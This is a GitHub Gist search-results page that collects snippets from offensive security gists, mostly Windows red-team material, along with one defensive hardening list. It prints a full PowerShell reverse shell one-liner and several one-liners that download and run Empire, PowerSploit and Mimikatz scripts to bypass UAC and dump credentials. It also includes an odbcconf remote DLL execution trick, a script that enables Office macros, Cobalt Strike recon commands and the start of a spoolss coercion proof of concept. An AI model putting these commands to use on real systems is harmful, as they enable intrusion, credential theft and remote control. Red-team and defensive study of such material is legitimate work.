Enter this in the search box along with your search terms:
Get all gists from the user santisbon.
user:santisbon
Find all gists with a .yml extension.
extension:yml
Find all gists with HTML files.
language:html
filipesam
Arno0x
/ odbcconf.cs
Created
November 22, 2017 15:30
Download and execute arbitrary code with odbcconf.exe
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| To use with odbcconf.exe: | |
| odbcconf /S /A {REGSVR odbcconf.dll} | |
| or, from a remote location (if WebDAV support enabled): | |
| odbcconf /S /A {REGSVR \\webdavaserver\dir\odbcconf.dll} | |
| */ | |
| using System; |
egre55
/ powershell_reverse_shell.ps1
Last active
April 2, 2025 13:44
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html | |
| $client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() |
Mbosinwa
/ block-macro-ms-office.txt
Last active
February 19, 2025 11:03
— forked from PSJoshi/block-macro-ms-office.txt
Block macros in Microsoft Office suite using registry
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| The default registry key for macro security is | |
| [HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security] | |
| "VBAWarnings"=dword:00000001 | |
| You could set it with a script: | |
| Set wso = CreateObject("WScript.Shell") | |
| wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\VBAWarnings", 1, "REG_DWORD" | |
| and it would enable macros. This only works if Word is either closed when you run the script or restarted afterwards. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Domain Recon | |
| ## ShareFinder - Look for shares on network and check access under current user context & Log to file | |
| powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt" | |
| ## Import PowerView Module | |
| powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')" | |
| ## Invoke-BloodHound for domain recon | |
| powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound" |
jivoi
/ RedTeam_CheatSheet.ps1
Created
July 14, 2018 14:52
— forked from m8sec/RedTeam_CheatSheet.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Description: | |
| # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
| # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
| # Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| # Import Mimikatz Module to run further commands |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://is.gd/Dopn98','katz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.* |
7MinSec
/ lowhanging.md
Last active
June 9, 2022 13:15
Low-hanging hacker fruit (and how to remove it)
This gist focuses on (relatively) free and (relatively) easy things organizations can do to better protect their networks without buying yet another black box with blinking lights.
Got some ideas of your own that should be on this list? Please leave a comment below!
Microsoft has a great paper on the topic that gives some nice high level recommendations:
- Use a unique password per site
- Enable complexity
HarmJ0y
/ cobaltstrike_sa.txt
Created
September 28, 2018 22:22
Cobalt Strike Situational Awareness Commands
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows version: | |
| reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion | |
| Users who have authed to the system: | |
| ls C:\Users\ | |
| System env variables: | |
| reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment | |
| Saved outbound RDP connections: |
3xocyte
/ dementor.py
Last active
February 25, 2025 00:20
rough PoC to connect to spoolss to elicit machine account authentication
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample | |
| # some code from https://www.exploit-db.com/exploits/2879/ | |
| import os | |
| import sys | |
| import argparse | |
| import binascii | |
| import ConfigParser |